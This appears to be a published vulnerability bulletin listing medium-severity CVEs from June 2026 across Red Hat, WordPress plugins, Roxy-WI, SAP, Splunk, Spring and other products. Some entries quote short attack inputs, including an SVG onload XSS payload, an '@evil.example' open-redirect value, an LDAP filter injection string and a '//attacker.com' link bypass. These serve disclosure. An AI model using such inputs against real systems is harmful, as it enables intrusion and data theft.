| Red Hat--Red Hat Directory Server 11 | A flaw was found in 389 Directory Server. The SMD5 password storage plugin performs unsigned integer underflow when computing salt length from a crafted password hash shorter than 16 bytes, causing a buffer over-read that crashes the LDAP server during authentication. | 2026-06-09 | 4.9 | CVE-2026-11789 |
| Red Hat--Red Hat Directory Server 11 | A flaw was found in 389 Directory Server. The PBKDF2-SHA256 password storage plugin does not enforce an upper bound on the iteration count extracted from stored password hashes. A privileged attacker who can modify a user's password hash can cause excessive CPU consumption during authentication, resulting in denial of service. | 2026-06-09 | 4.9 | CVE-2026-11790 |
| Red Hat--Red Hat Directory Server 11 | A stack buffer overflow flaw was found in 389 Directory Server. The checkPrefix() function in pw.c copies an attacker-controlled algorithm ID into a 256-byte stack buffer without bounds checking when parsing reversible-encrypted attribute values. An attacker with Directory Manager privileges can crash the LDAP server by storing a crafted credential with an oversized algorithm ID. FORTIFY_SOURCE mitigates this to denial of service only. | 2026-06-09 | 4.9 | CVE-2026-11793 |
| Red Hat--Red Hat Enterprise Linux 10 | An out-of-bounds write vulnerability was found in GStreamer's H.266/VVC PPS picture partition parser in gst-plugins-bad. In the multi-slice-in-tile processing of gst_h266_parser_parse_picture_partition() (gsth266parser.c), the loop iterates without checking that the slice index stays within bounds, writing past three fixed-size arrays (slice_height_in_ctus, slice_top_left_ctu_x, slice_top_left_ctu_y) in the GstH266PPS structure. While the initial proof-of-concept demonstrated a 4-byte out-of-bounds write, the code permits larger writes across multiple iterations. A crafted H.266/VVC media file can trigger this vulnerability. | 2026-06-11 | 6.5 | CVE-2026-53701 |
| Red Hat--Red Hat Enterprise Linux 10 | A stack buffer overflow flaw was found in the GStreamer H.265 codec parser library (gst-plugins-bad). When parsing a buffering period SEI message, the parser uses an incorrect loop bound derived from cpb_cnt_minus1[i] (the loop index) instead of the sub-layer 0 CPB count cpb_cnt_minus1[0] from the referenced Sequence Parameter Set. A crafted H.265 video file or stream can cause the parser to write beyond the bounds of stack-allocated CPB delay arrays, resulting in a crash or potential stack memory corruption. | 2026-06-11 | 6.5 | CVE-2026-53702 |
| Red Hat--Red Hat Enterprise Linux 6 | A content injection vulnerability was found in the ABRT post-create event handler scripts in libreport. The event script queries the systemd journal for log entries matching the crashed process and writes the results to files in the dump directory without sanitizing embedded control characters. A local user can inject arbitrary content into the journal output by embedding newline characters in syslog messages, controlling the content that root writes to dump directory files. | 2026-06-13 | 5.5 | CVE-2026-54231 |
| Red Hat--Red Hat Hardened Images | An integer underflow vulnerability was found in MIT krb5 in the berval2tl_data() function in plugins/kdb/ldap/libkdb_ldap/ldap_principal2.c. The function performs an unsigned subtraction (bv_len - 2) without a prior bounds check. When bv_len is 0 or 1, the subtraction wraps to a large value which is then truncated to uint16_t, yielding 0xFFFE (65534) or 0xFFFF (65535). The subsequent malloc succeeds and memcpy reads up to 65534 bytes from a 0-1 byte buffer, resulting in a heap out-of-bounds read. The attack vector involves a malicious or compromised LDAP KDB backend returning a krbExtraData attribute with bv_len < 2, triggering the underflow when the KDC or kadmind reads principal data. | 2026-06-11 | 5 | CVE-2026-11850 |
| Red Hat--Red Hat Quay 3 | A flaw was found in Quay. The filedrop endpoint accepts any mime type without validation, allowing an authenticated user with repository write access to upload a malicious SVG file containing JavaScript. The file is stored and served inline through the CDN, enabling stored cross-site scripting when a victim visits the archive URL. | 2026-06-08 | 5.4 | CVE-2026-11569 |
| Revolution Slider--Slider Revolution | The Slider Revolution plugin for WordPress is vulnerable to Sensitive Information Disclosure in versions up to and including 7.0.10. This is due to three compounding design flaws: (1) the plugin leaks a valid backend AJAX nonce (revslider_actions) to all authenticated users including Subscribers via the admin_footer hook; (2) the wordpress.create.image_from_url action is explicitly allowlisted in the $user_allowed array, bypassing the administrator-only access control; (3) the create_wordpress_image_from_url() function accepts an attacker-controlled url parameter that is passed to import_media(), where path_or_url_exists() explicitly accepts local filesystem paths (file_exists() && is_readable()) with no restriction to remote HTTP/HTTPS URLs, and @copy() physically copies those files into the publicly accessible /wp-content/uploads/revslider/ai/ directory. The MIME type check trusts the attacker-supplied content_type parameter to derive the destination extension without verifying actual file content, and the source extension blacklist does not block many sensitive types (.sql, .log, .json, .bak, .xml, .csv, .conf, .yml, .yaml, .pem, .key, .crt, .txt, .db, etc.). This makes it possible for authenticated attackers with Subscriber-level access and above to read the contents of server files with non-blacklisted extensions by having them copied to a publicly accessible URL. | 2026-06-09 | 6.5 | CVE-2026-7542 |
| rikyoz--bit7z | bit7z is a cross-platform C++ static library that allows the compression/extraction of archive files. Prior to version 4.0.12, there is an arbitrary file overwrite vulnerability via symlink attack on predictable temp files during archive update. This issue has been patched in version 4.0.12. | 2026-06-10 | 6.1 | CVE-2026-45384 |
| romancartsupport--RomanCart Ecommerce | The RomanCart Ecommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'blclass' attribute (and other attributes) of the romancart_button shortcode in versions up to, and including, 2.0.8. This is due to insufficient input sanitization and output escaping on user supplied attributes within the romancart_button_shortcode() function. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-09 | 6.4 | CVE-2026-8880 |
| roxy-wi--roxy-wi | Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. In versions 8.2.6.4 and prior, wrap_line (app/modules/common/common.py:181-186) and highlight_word (app/modules/common/common.py:188-192) build raw HTML by string concatenation with no escaping. The frontend (app/static/js/script.js, log-viewer paths) uses .html(data) / .append(data) to inject the response body. Anyone able to write a line into a managed HAProxy/Nginx access log (i.e. anyone who can send an HTTP request to the public LB) can land an <svg/onload=¦> payload that executes when a Roxy-WI admin opens the log viewer. At time of publication, there are no publicly available patches. | 2026-06-10 | 6.1 | CVE-2026-45560 |
| roxy-wi--roxy-wi | Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. In versions 8.2.6.4 and prior, the /smon/agent/{version,uptime,status,checks}/<server_ip> family of routes takes the URL path component verbatim into requests.get(f'http://{server_ip}:{agent_port}/...'). The path component is constrained only by Flask's default URL converter, which permits any value (including IPv4 literals like 169.254.169.254, RFC1918 ranges, and 127.0.0.1). At time of publication, there are no publicly available patches. | 2026-06-10 | 6.5 | CVE-2026-45561 |
| roxy-wi--roxy-wi | Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. In versions 8.2.6.4 and prior, the login flow allow-lists next URLs by rejecting strings containing https:// or http:// substrings, then constructs https://{request.host}{next_url} and the JS client redirects via window.location.replace(). The block does not consider the userinfo@host syntax. next=@evil.example/path produces https://victim.example@evil.example/path, which all modern browsers route to evil.example. At time of publication, there are no publicly available patches. | 2026-06-10 | 6.1 | CVE-2026-45566 |
| roxy-wi--roxy-wi | Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. In versions 8.2.6.4 and prior, get_ldap_email (app/modules/roxywi/user.py:120-157) builds the LDAP search filter via f-string concatenation. The username URL path parameter is taken verbatim - no checkAjaxInput, no LDAP escape - and inserted, a username like *)(mail=*)(cn=* injects additional clauses, allowing the admin to enumerate or harvest attributes outside the intended record. At time of publication, there are no publicly available patches. | 2026-06-10 | 4.9 | CVE-2026-45559 |
| roxy-wi--roxy-wi | Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. In versions 8.2.6.4 and prior, GET /history/<service>/<server_ip> re-uses the server_ip path parameter as a user-id when service == 'user', with no authorization check. Any authenticated user - even a guest in an unrelated group - can list any other user's full action audit trail (server IPs touched, configs deployed, services restarted). At time of publication, there are no publicly available patches. | 2026-06-10 | 4.3 | CVE-2026-45563 |
| saas.group--Juicer | Juicer through 1.12.18 fails to escape remote feed API response fields before rendering them on the admin settings page. Attackers controlling the connected feed data can inject script that executes in an administrator's browser when the settings page loads. | 2026-06-10 | 6.1 | CVE-2026-53737 |
| SAP_SE--ODP Data Replication APIs | The Remote Function Call (RFC) modules of the Operational Data Provisioning Data Replication API (ODP-RFC) are missing caller identification of permitted SAP-internal applications and are being used by customer or third-party applications in ways that are not aligned with its intended usage. Which could lead to unintended disclosure of data, but does not affect integrity, and poses minimal availability concerns for the application. | 2026-06-09 | 6.6 | CVE-2026-44754 |
| SAP_SE--SAP Business Objects Business Intelligence Platform | SAP Business Objects Business Intelligence Platform does not sufficiently validate email sending parameters supplied by authenticated users, resulting in an email spoofing vulnerability.This vulnerability has a low impact on integrity and does not affect the confidentiality and availability of the application. | 2026-06-09 | 4.3 | CVE-2026-44755 |
| SAP_SE--SAP Fiori (launchpad) | SAP Fiori Launchpad allows attackers to craft malicious URLs that triggers arbitrary service calls on the Fiori domain, this when opened by the user could compromise accounts by stealing user credentials. Successful exploitation requires adversaries to possess advanced knowledge of the system causing low impact on Confidentiality and Integrity. Availability of the system is no impacted. | 2026-06-09 | 4.2 | CVE-2026-24315 |
| SAP_SE--SAP MDG (Review Match Groups Application) | SAP MDG (Review Match Groups Application) does not perform the necessary authorization checks for authenticated users. This could allow a low-privileged user to perform actions that would otherwise be restricted, resulting in escalation of privileges. This has a low impact on integrity, while confidentiality and availability are not impacted. | 2026-06-09 | 4.3 | CVE-2026-44750 |
| SAP_SE--SAP NetWeaver AS Java (JDBC Test Servlet) | Due to a reflected cross-site scripting (XSS) vulnerability in SAP NetWeaver JAVA (JDBC Test Servlet), an unauthenticated attacker could craft a URL that embeds a malicious script. If a victim clicks this link, the injected input is processed during web page generation, resulting in the execution of malicious content in the victim's browser. This could allow the attacker to access and/or modify information related to the webclient, impacting the confidentiality and integrity of the application, with no impact to availability. | 2026-06-09 | 6.1 | CVE-2026-44746 |
| SAP_SE--SAP S/4HANA | SAP S/4HANA(On-Premise) contains SQL injection vulnerability in a remote-enabled function module component that could be exploited by an authenticated attacker to potentially execute unauthorized database queries.This flaw exposes sensitive information to which they should not otherwise have access to. The vulnerability has a high impact on the confidentiality of the data with no impact on the integrity and availability of the application. | 2026-06-09 | 6.5 | CVE-2026-44744 |
| SAP_SE--SAP Wily Introscope Enterprise Manager | SAP Wily Introscope Enterprise Manager allows an unauthenticated attacker to craft a specially crafted URL. Under certain conditions, when accessed by a victim, the injected script could execute in the user�s browser within the context of the application. This issue has a low impact on the confidentiality and integrity of the application with no impact on availability. | 2026-06-09 | 4.7 | CVE-2026-44757 |
| shortpixel--Enable Media Replace | The Enable Media Replace plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'location_dir' parameter in all versions up to, and including, 4.1.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-09 | 6.4 | CVE-2026-5714 |
| Siemens--SINEC INS | A vulnerability has been identified in SINEC INS (All versions < V1.0 SP2 Update 6). The affected application does not properly sanitize path input in the `GET /api/sftp/uploadFiles` endpoint used for directory listing. This allows path traversal through crafted input, enabling access to unintended file system locations. | 2026-06-09 | 4.3 | CVE-2026-46747 |
| Siemens--SIPROTEC 5 6MD84 (CP300) | A vulnerability has been identified in SIPROTEC 5 6MD84 (CP300) (All versions), SIPROTEC 5 6MD85 (CP200) (All versions), SIPROTEC 5 6MD85 (CP300) (All versions), SIPROTEC 5 6MD86 (CP200) (All versions), SIPROTEC 5 6MD86 (CP300) (All versions), SIPROTEC 5 6MD89 (CP300) (All versions), SIPROTEC 5 6MU85 (CP300) (All versions), SIPROTEC 5 7KE85 (CP200) (All versions), SIPROTEC 5 7KE85 (CP300) (All versions), SIPROTEC 5 7SA82 (CP100) (All versions), SIPROTEC 5 7SA82 (CP150) (All versions), SIPROTEC 5 7SA86 (CP200) (All versions), SIPROTEC 5 7SA86 (CP300) (All versions), SIPROTEC 5 7SA87 (CP200) (All versions), SIPROTEC 5 7SA87 (CP300) (All versions), SIPROTEC 5 7SD82 (CP100) (All versions), SIPROTEC 5 7SD82 (CP150) (All versions), SIPROTEC 5 7SD86 (CP200) (All versions), SIPROTEC 5 7SD86 (CP300) (All versions), SIPROTEC 5 7SD87 (CP200) (All versions), SIPROTEC 5 7SD87 (CP300) (All versions), SIPROTEC 5 7SJ81 (CP100) (All versions), SIPROTEC 5 7SJ81 (CP150) (All versions), SIPROTEC 5 7SJ82 (CP100) (All versions), SIPROTEC 5 7SJ82 (CP150) (All versions), SIPROTEC 5 7SJ85 (CP200) (All versions), SIPROTEC 5 7SJ85 (CP300) (All versions), SIPROTEC 5 7SJ86 (CP200) (All versions), SIPROTEC 5 7SJ86 (CP300) (All versions), SIPROTEC 5 7SK82 (CP100) (All versions), SIPROTEC 5 7SK82 (CP150) (All versions), SIPROTEC 5 7SK85 (CP200) (All versions), SIPROTEC 5 7SK85 (CP300) (All versions), SIPROTEC 5 7SL82 (CP100) (All versions), SIPROTEC 5 7SL82 (CP150) (All versions), SIPROTEC 5 7SL86 (CP200) (All versions), SIPROTEC 5 7SL86 (CP300) (All versions), SIPROTEC 5 7SL87 (CP200) (All versions), SIPROTEC 5 7SL87 (CP300) (All versions), SIPROTEC 5 7SS85 (CP200) (All versions), SIPROTEC 5 7SS85 (CP300) (All versions), SIPROTEC 5 7ST85 (CP200) (All versions), SIPROTEC 5 7ST85 (CP300) (All versions), SIPROTEC 5 7ST86 (CP300) (All versions), SIPROTEC 5 7SX82 (CP150) (All versions), SIPROTEC 5 7SX85 (CP300) (All versions), SIPROTEC 5 7SY82 (CP150) (All versions), SIPROTEC 5 7UM85 (CP300) (All versions), SIPROTEC 5 7UT82 (CP100) (All versions), SIPROTEC 5 7UT82 (CP150) (All versions), SIPROTEC 5 7UT85 (CP200) (All versions), SIPROTEC 5 7UT85 (CP300) (All versions), SIPROTEC 5 7UT86 (CP200) (All versions), SIPROTEC 5 7UT86 (CP300) (All versions), SIPROTEC 5 7UT87 (CP200) (All versions), SIPROTEC 5 7UT87 (CP300) (All versions), SIPROTEC 5 7VE85 (CP300) (All versions), SIPROTEC 5 7VK87 (CP200) (All versions), SIPROTEC 5 7VK87 (CP300) (All versions), SIPROTEC 5 7VU85 (CP300) (All versions), SIPROTEC 5 Compact 7SX800 (CP050) (All versions). The affected application allows authenticated users to upload arbitrary files using DIGSI 5 protocol. This could allow an attacker to upload malicious configuration files, that could cause denial of service condition and potentially lead to code execution. | 2026-06-09 | 6.1 | CVE-2025-40808 |
| signalwire--freeswitch | FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.11.0, FreeSWITCH includes a vulnerable function, PREFIX(prologTok)(), in libs/xmlrpc-c/lib/expat/xmltok/xmltok_impl.c, which was cloned from an outdated and vulnerable version in libexpat/libexpat. The function did not receive the corresponding security patch. This issue has been patched in version 1.11.0. | 2026-06-09 | 5.3 | CVE-2026-49472 |
| signalwire--freeswitch | FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.11.1, mod_verto's JSON-RPC handler bound the connection to the client-supplied sessid on the first frame, before the authentication gate. Binding inserts the connection into the global session hash and, on a key collision, drops the prior occupant of that slot - sending it a verto.punt, detaching its calls, and closing its socket. An unauthenticated network attacker who knows a target session UUID could therefore evict the legitimate client. This issue has been patched in version 1.11.1. | 2026-06-09 | 5.3 | CVE-2026-49843 |
| signalwire--freeswitch | FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.11.1, mod_verto's check_auth userauth branch wrote request-supplied userVariables into the connection state before comparing the supplied password. The writes are append-only and the connection is not closed on a failed compare, so values declared on bad-password attempts persisted on the same WebSocket and carried into a subsequent successful login on that connection. This issue has been patched in version 1.11.1. | 2026-06-09 | 4.3 | CVE-2026-49848 |
| Silverpeas--Silverpeas | Silverpeas through 6.4.6 mishandles the "Personal space" feature that is selected when no componentId is set. | 2026-06-10 | 6.5 | CVE-2026-53698 |
| smithyhq--sqladmin | SQLAdmin is a flexible Admin interface for SQLAlchemy models. Prior to version 0.25.1, the ajax_lookup endpoint in application.py bypasses the is_accessible() access control check that all other endpoints enforce. If a developer restricts model access by overriding is_accessible(), an authenticated user can still query that model's data through the ajax_lookup endpoint - silently bypassing the restriction. This issue has been patched in version 0.25.1. | 2026-06-10 | 4.3 | CVE-2026-46645 |
| smub--aThemes Addons for Elementor | The aThemes Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'title_tag' Widget Setting in all versions up to, and including, 1.1.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This affects the Posts Timeline widget as well as the Posts Carousel widget across its default, Banner, and Modern skins, all of which omit the whitelist validation that is correctly applied in the Posts List widget. | 2026-06-10 | 6.4 | CVE-2026-8613 |
| softaculous--Page Builder: Pagelayer Drag and Drop website builder | The Page Builder: Pagelayer - Drag and Drop website builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Anchor block in versions up to, and including, 2.0.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-13 | 6.4 | CVE-2026-3297 |
| softaculous--Page Builder: Pagelayer Drag and Drop website builder | The Page Builder: Pagelayer - Drag and Drop website builder plugin for WordPress is vulnerable to Incorrect Authorization in all versions up to, and including, 2.0.9. This is due to the pagelayer_save_content AJAX handler allowing users with basic post-edit capability to persist pagelayer_contact_templates metadata on posts they can edit (including pending posts), while the unauthenticated pagelayer_contact_submit endpoint later consumes that metadata by user-controlled post/form identifiers without enforcing a privileged or published-context boundary. This makes it possible for authenticated attackers, with Contributor-level access and above, to configure arbitrary contact-form mail templates that are usable through unauthenticated form submission via the contacts parameter. In typical deployments this template feature is configured via Pagelayer Pro UI; however, the vulnerable backend trust path is still present. This issue may be chained with CVE-2026-2442 to increase exploitability and attacker control over outbound email behavior. | 2026-06-13 | 4.3 | CVE-2026-2470 |
| SolarWinds--Observability Self-Hosted | A vulnerability in which an attacker can provide a crafted external URL that may redirect a user to an unintended website. | 2026-06-09 | 4.8 | CVE-2026-28301 |
| solidtime-io--solidtime | Solidtime is an open-source time-tracking app. Prior to version 0.12.2, Solidtime defines an explicit invitations:view and members:view permissions that gates the official invitations and members API. The Jetstream web team page authorizes access with only belongsToTeam() and then loads and serializes all pending invitation emails as well as members into Inertia props. Any employee who belongs to the organization can read pending invitation email addresses and members through the serialised inertia data in the team page body even though the same user is forbidden from the API. This issue has been patched in version 0.12.2. | 2026-06-12 | 4.3 | CVE-2026-47236 |
| SourceCodester--Barangay Resident Profiling and Information Management System | A vulnerability has been found in SourceCodester Barangay Resident Profiling and Information Management System 1.0. The impacted element is an unknown function of the file passsword_reset.php of the component Password Reset Handler. Such manipulation of the argument new_password with the input password123 leads to use of hard-coded password. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2026-06-08 | 5.3 | CVE-2026-11515 |
| SourceCodester--CET Automated Grading System with AI Predictive Analytics | A vulnerability has been found in SourceCodester CET Automated Grading System with AI Predictive Analytics 1.0. The impacted element is an unknown function of the file /index.php. The manipulation of the argument action leads to cross site scripting. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used. | 2026-06-13 | 4.3 | CVE-2026-12176 |
| SourceCodester--Inventory System | A security flaw has been discovered in SourceCodester Inventory System 1.0. Affected by this vulnerability is an unknown functionality of the file /Product_Inventory/api/users_handler.php of the component Account Creation Handler. The manipulation of the argument ROLE results in improper authorization. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks. | 2026-06-08 | 6.3 | CVE-2026-11519 |
| SourceCodester--Inventory System | A vulnerability was identified in SourceCodester Inventory System 1.0. Affected is an unknown function of the file /users.php of the component User Management Page. The manipulation of the argument fullname/username leads to cross site scripting. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. | 2026-06-08 | 4.3 | CVE-2026-11518 |
| SourceCodester--Onlne Examination & Learning Management System | A vulnerability has been found in SourceCodester Onlne Examination & Learning Management System and Syllabus-aligned Learning Management and Examination System 1.0. Affected by this issue is some unknown functionality of the file import_users.php. The manipulation of the argument raw_password with the input CICT_2026 leads to use of hard-coded password. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. This product is distributed under two entirely different names. | 2026-06-08 | 5.3 | CVE-2026-11552 |
| Sparkle WP--MetroStore | Missing Authorization vulnerability in Sparkle WP MetroStore metrostore allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects MetroStore: from n/a through 1.3.2. | 2026-06-11 | 4.3 | CVE-2023-32959 |
| spearman--unbounded-spsc | unbounded_spsc is an "unbounded" extension of bounded_spsc_queue. In versions 0.2.0 and prior, sender::send pointer-as-value transmute causes OOB read and fake-Arc drop under TX/RX race. At time of publication, there are no publicly available patches. | 2026-06-12 | 5.8 | CVE-2026-46690 |
| Splunk--Splunk Enterprise | In Splunk Enterprise versions below 10.2.4, 10.0.7, 9.4.12, and 9.3.13, and Splunk Cloud Platform versions below 10.3.2512.13, 10.2.2510.15, 10.1.2507.23, and 9.3.2411.132, a low-privileged user that does not hold the 'admin' or 'power' Splunk roles could craft a malicious classic dashboard that exfiltrates sensitive data to an external server when a higher-privileged user views it, bypassing the external content restriction through a Cascading Style Sheets (CSS) injection.<br><br>The Trusted Domains security check does not fully validate inline style attribute values, which can allow for outbound requests to untrusted domains and credential exfiltration when a victim views a crafted dashboard. | 2026-06-10 | 5.7 | CVE-2026-20254 |
| Splunk--Splunk Enterprise | In Splunk Enterprise versions below 10.2.4, 10.0.7, 9.4.12, and 9.3.13, and Splunk Cloud Platform versions below 10.3.2512.13, 10.2.2510.15, 10.1.2507.23, and 9.3.2411.132, a low-privileged user that does not hold the "admin" or "power" Splunk roles could craft a malicious classic dashboard that exfiltrates sensitive data to an external server. The vulnerability exists because URL validation on the external content dialog is incomplete, which can allow for requests to untrusted domains when a user interacts with a crafted dashboard. | 2026-06-10 | 5.7 | CVE-2026-20255 |
| Splunk--Splunk Enterprise | In Splunk Enterprise versions below 10.2.4, 10.0.7, 9.4.12, and 9.3.13, and Splunk Cloud Platform versions below 10.3.2512.13, 10.2.2510.15, 10.1.2507.23, and 9.3.2411.132, a low-privileged user that does not hold the 'admin' or 'power' Splunk roles could cause data exfiltration through classic dashboards by redirecting a victim to an external site using a protocol-relative URL in a drill-down link.<br><br>The vulnerability exists because the URL classifier in classic dashboards only recognizes `http://` and `https://` schemes when checking for external URLs. Protocol-relative URLs such as `//attacker.com` bypass this check entirely, and Splunk Web does not show the external-navigation warning dialog to the victim. | 2026-06-10 | 5.7 | CVE-2026-20256 |
| Splunk--Splunk Enterprise | In Splunk Enterprise versions below 10.2.4, 10.0.7, 9.4.12, and 9.3.13, and Splunk Cloud Platform versions below 10.3.2512.13, 10.2.2510.15, 10.1.2507.23, and 9.3.2411.132, a low-privileged user that does not hold the "admin" or "power" Splunk roles could craft a classic dashboard that exfiltrates sensitive data from the browser of a higher-privileged user who views it. The exfiltration is possible because classic dashboard panels do not fully validate style attribute values, which can allow for requests to reach external domains outside the configured Trusted Domains List. The vulnerability requires the attacker to phish the victim by tricking them into initiating a request within their browser. The low-privileged user should not be able to exploit the vulnerability at will. | 2026-06-10 | 5.7 | CVE-2026-20257 |
| Splunk--Splunk Enterprise | In Splunk Enterprise versions below 10.2.4 and 10.0.7, and Splunk Cloud Platform versions below 10.4.2604.0, 10.3.2512.12, 10.2.2510.15, 10.1.2507.23, 10.0.2503.14, and 9.3.2411.131, a user who holds a Splunk role that contains the high-privilege capability `edit_saved_search_owner` could reassign saved search ownership to users outside their authorized scope. The ownership reassignment endpoint lacks access control. | 2026-06-10 | 5.5 | CVE-2026-20259 |
| Splunk--Splunk SOAR | In Splunk SOAR (Security Orchestration, Automation, and Response) versions below 8.5.0, an unauthenticated attacker could inject American National Standards Institute (ANSI) escape codes into SOAR application log files through specially crafted HTTP request paths, which a terminal emulator might interpret when an administrator views the logs.<br><br>The injection is possible because SOAR does not strip control characters from HTTP request paths before writing them to application logs. | 2026-06-10 | 4.3 | CVE-2026-20260 |
| Spring--Reactor Netty | In specific scenarios involving HTTP redirects from a secure to an insecure endpoint, the Reactor Netty HTTP client may leak credentials. In order for this to happen, the HTTP client must have been explicitly configured to follow redirects. Affected versions: Reactor Netty 1.0.0 through 1.0.51; 1.1.0 through 1.1.35; 1.2.0 through 1.2.17; 1.3.0 through 1.3.5. | 2026-06-09 | 6.1 | CVE-2026-41715 |
| Spring--Spring AMQP | Correlation IDs for replies in the RabbitTemplate.sendAndReceive() with the fixed reply queue are predictable due to internal simple counter. Affected versions: Spring AMQP 4.0.0 through 4.0.3; 3.2.0 through 3.2.10; 3.1.0 through 3.1.15; 2.4.0 through 2.4.17. | 2026-06-09 | 4.4 | CVE-2026-41701 |
| Spring--Spring AMQP | Applications that configure their broker connection via RabbitConnectionFactoryBean.setUri("amqps://...") without also calling setUseSSL(true) get TLS encryption with no certificate validation and no hostname verification. Affected versions: Spring AMQP 4.0.0 through 4.0.3; 3.2.0 through 3.2.10; 3.1.0 through 3.1.15; 2.4.0 through 2.4.17. | 2026-06-09 | 4 | CVE-2026-41714 |
| Spring--Spring Boot | Spring Boot's Mail auto-configuration does not enable hostname verification. Applications that set the relevant JavaMail property, such as spring.mail.properties.mail.smtp.ssl.checkserveridentity=true, are not affected. Affected versions: Spring Boot 4.0.0 through 4.0.6; 3.5.0 through 3.5.14; 3.4.0 through 3.4.16. | 2026-06-11 | 5 | CVE-2026-40992 |
| Spring--Spring Boot | Spring Boot's ArtemisEmbeddedConfigurationFactory uses a fixed, static path for the embedded Artemis message broker's data directory when no explicit path is configured. A local attacker on the same host can pre-create this predictable directory or place a symlink before the application starts. Affected versions: Spring Boot 4.0.0 through 4.0.6; 3.5.0 through 3.5.14; 3.4.0 through 3.4.16; 3.3.0 through 3.3.19; 2.7.0 through 2.7.33. | 2026-06-11 | 5.3 | CVE-2026-41001 |
| Spring--Spring Data Commons | Applications using Spring Data Commons may be vulnerable to a Denial of Service (DoS) attack leading to a StackOverflowException when parsing Sort parameters. Affected versions: Spring Data Commons 4.0.0 through 4.0.5; 3.5.0 through 3.5.11; 3.4.0 through 3.4.14; 3.3.0 through 3.3.16; 3.2.0 through 3.2.15; 3.1.0 through 3.1.14; 3.0.0 through 3.0.15; 2.7.0 through 2.7.19. | 2026-06-09 | 5.9 | CVE-2026-41711 |
| Spring--Spring Data Commons | Spring Data Commons contains a vulnerability that can lead to a Denial of Service (DoS) condition if Spring Data Web Support is enabled in conjunction with a Controller method using @ProjectedPayload, when an attacker sends a specially crafted HTTP request that causes the application to allocate lots of memory. Affected versions: Spring Data Commons 4.0.0 through 4.0.5; 3.5.0 through 3.5.11; 3.4.0 through 3.4.14; 3.3.0 through 3.3.16; 3.2.0 through 3.2.15; 3.1.0 through 3.1.14; 3.0.0 through 3.0.15; 2.7.0 through 2.7.19. | 2026-06-09 | 5.9 | CVE-2026-41721 |
| Spring--Spring Data KeyValue | A SpEL Injection vulnerability exists in the Spring Data KeyValue if unsanitized user input is passed as Sort into a repository query method that delegates evaluation to the SpelPropertyComparator. Affected versions: Spring Data KeyValue / Spring Data Redis 4.0.0 through 4.0.5; 3.5.0 through 3.5.11; 3.4.0 through 3.4.14; 3.3.0 through 3.3.16; 3.2.0 through 3.2.15; 3.1.0 through 3.1.14; 3.0.0 through 3.0.15; 2.7.0 through 2.7.19. | 2026-06-09 | 6.4 | CVE-2026-41719 |
| Spring--Spring Data MongoDB | Spring Data MongoDB repository query methods annotated with @Query that use regex parameter binding perform insufficient validation of the bound parameter. An attacker can supply a crafted string to break out of the intended regular expression quoting. Affected versions: Spring Data MongoDB 5.0.0 through 5.0.5; 4.5.0 through 4.5.11; 4.4.0 through 4.4.14; 4.3.0 through 4.3.16; 4.2.0 through 4.2.15; 4.1.0 through 4.1.14; 4.0.0 through 4.0.15; 3.4.0 through 3.4.19. | 2026-06-09 | 5.9 | CVE-2026-41696 |
| Spring--Spring Data Relational | Spring Data Relational does not properly escape binding values of externally-controlled input when using StringMatcher (STARTING, ENDING, or CONTAINING) in Query By Example (QBE). An attacker can supply wildcard characters to perform boolean-based blind data inference. Affected versions: Spring Data Relational/JDBC/R2DBC 4.0.0 through 4.0.5; 3.5.0 through 3.5.11; 3.4.0 through 3.4.14; 3.3.0 through 3.3.16; 3.2.0 through 3.2.15; 3.1.0 through 3.1.14; 3.0.0 through 3.0.15; 2.4.0 through 2.4.19. | 2026-06-09 | 4.8 | CVE-2026-41697 |
| Spring--Spring Data REST | Spring Data REST serializes the full exception cause chain into HTTP error response bodies, potentially exposing persistence-layer internals to HTTP clients. Affected versions: Spring Data REST 3.7.0 through 3.7.19; 4.3.0 through 4.3.16; 4.4.0 through 4.4.14; 4.5.0 through 4.5.11; 5.0.0 through 5.0.5. | 2026-06-09 | 5.3 | CVE-2026-41730 |
| Spring--Spring Data REST | Spring Data REST's Querydsl integration accepts arbitrary persistent property paths as request-parameter filter keys and does not consider Jackson customizations before handing them to Querydsl. Affected versions: Spring Data REST 3.7.0 through 3.7.19; 4.3.0 through 4.3.16; 4.4.0 through 4.4.14; 4.5.0 through 4.5.11; 5.0.0 through 5.0.5. | 2026-06-09 | 5.3 | CVE-2026-41837 |
| Spring--Spring for Apache Kafka | When an application opts into DelegatingDeserializer, a producer can grow the consumer's heap without bound by sending records with unique random spring.kafka.serialization.selector header values, eventually causing GC thrash and OutOfMemoryError. Affected versions: Spring for Apache Kafka 4.0.0 through 4.0.5; 3.3.0 through 3.3.15; 3.2.0 through 3.2.13; 2.9.0 through 2.9.13; 2.8.0 through 2.8.11. | 2026-06-09 | 6.5 | CVE-2026-41726 |
